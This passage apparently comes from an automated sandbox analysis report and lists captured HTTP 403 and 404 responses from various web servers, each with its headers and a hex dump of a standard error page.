                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:51:37 GMTServer: Apache/2.4.56 (Unix) OpenSSL/1.0.2k-fipsContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 31 May 2023 12:51:36 GMTServer: ApacheLast-Modified: Tue, 13 Sep 2022 03:20:48 GMTAccept-Ranges: bytesContent-Length: 1260Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Sucuri/CloudproxyDate: Wed, 31 May 2023 12:51:38 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Sucuri-ID: 15015X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-Sucuri-Block: BNP006Data Raw: 33 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 75 63 75 72 69 2e 6e 65 74 2f 73 75 63 75 72 69 2d 66 69 72 65 77 61 6c 6c 2d 62 6c 6f 63 6b 2e 63 73 73 22 20 2f 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 75 63 75 72 69 20 57 65 62 53 69 74 65 20 46 69 72 65 77 61 6c 6c 20 2d 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 61 70 70 2d 68 65 61 64 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 2f 61 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 2d 6e 65 61 72 74 65 78 74 22 3e 57 65 62 73 69 74 65 20 46 69 72 65 77 61 6c 6c 3c 2f 73 70 61 6e 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6c 69 6e 6b 22 3e 42 61 63 6b 20 74 6f 20 73 75 63 75 72 69 2e 6e 65 74 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 0d 0a 34 64 38 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 70 70 2d 63 6f 6e 74 65 6e 74 20 61 63 63 65 73 73 2d 64 65 6e 69 65 64 20 63 6c 65 61 72 66 69 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 20 63 65 6e 74 65 72 20 77 69 64 74 68 2d 6d 61 78 2d 39 34 30 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 62 72 61 6e 64 2d 6
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:51:38 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveServer: nginxVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:51:38 GMTServer: Apache/2.4.56 (Unix) OpenSSL/1.0.2k-fipsContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:51:39 GMTContent-Type: text/htmlContent-Length: 559Connection: keep-aliveServer: IdeaWebServer/5.2.0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 33 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 69 64 65 61 2f 73 74 61 74 69 63 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 2d 73 74 72 6f 6e 67 22 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 64 65 73 63 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 64 6f 63 75 6d 65 6e 74 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 20 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>Error 403</title><link href="/idea/static/style.css" rel="stylesheet"></head><body><div class="error-container"><div class="error-text"><h1>Error</h1></div><div class="error-text-strong"><h1>403</h1></div><div class="error-text"><h1>Forbidden</h1></div></div><div class="error-descr-container"><p>You don't have permission to access this document.</p></div> </body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Sucuri/CloudproxyDate: Wed, 31 May 2023 12:51:40 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Sucuri-ID: 15003X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-Sucuri-Block: FBP006Data Raw: 33 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 75 63 75 72 69 2e 6e 65 74 2f 73 75 63 75 72 69 2d 66 69 72 65 77 61 6c 6c 2d 62 6c 6f 63 6b 2e 63 73 73 22 20 2f 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 75 63 75 72 69 20 57 65 62 53 69 74 65 20 46 69 72 65 77 61 6c 6c 20 2d 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 61 70 70 2d 68 65 61 64 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 2f 61 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 2d 6e 65 61 72 74 65 78 74 22 3e 57 65 62 73 69 74 65 20 46 69 72 65 77 61 6c 6c 3c 2f 73 70 61 6e 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6c 69 6e 6b 22 3e 42 61 63 6b 20 74 6f 20 73 75 63 75 72 69 2e 6e 65 74 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 0d 0a 34 63 66 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 70 70 2d 63 6f 6e 74 65 6e 74 20 61 63 63 65 73 73 2d 64 65 6e 69 65 64 20 63 6c 65 61 72 66 69 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 20 63 65 6e 74 65 72 20 77 69 64 74 68 2d 6d 61 78 2d 39 34 30 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 62 72 61 6e 64 2d 6
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenCache-Control: no-cache, must-revalidateContent-Length: 77561Content-Type: text/html; charset=UTF-8Date: Wed, 31 May 2023 12:51:41 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceX-Contextid: LxvHS7qY/h79I8pcsData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 3
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:51:42 GMTServer: ApacheUpgrade: h2Connection: Upgrade, Keep-AliveX-Powered-By: PHP/7.3.33Content-Length: 0Keep-Alive: timeout=5, max=150Content-Type: text/html; charset=UTF-8
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 31 May 2023 12:51:42 GMTContent-Type: text/htmlContent-Length: 552Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 31 May 2023 12:51:43 GMTContent-Type: text/html; charset=UTF-8Server: ghsContent-Length: 1561X-XSS-Protection: 0X-Frame-Options: SAMEORIGINData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 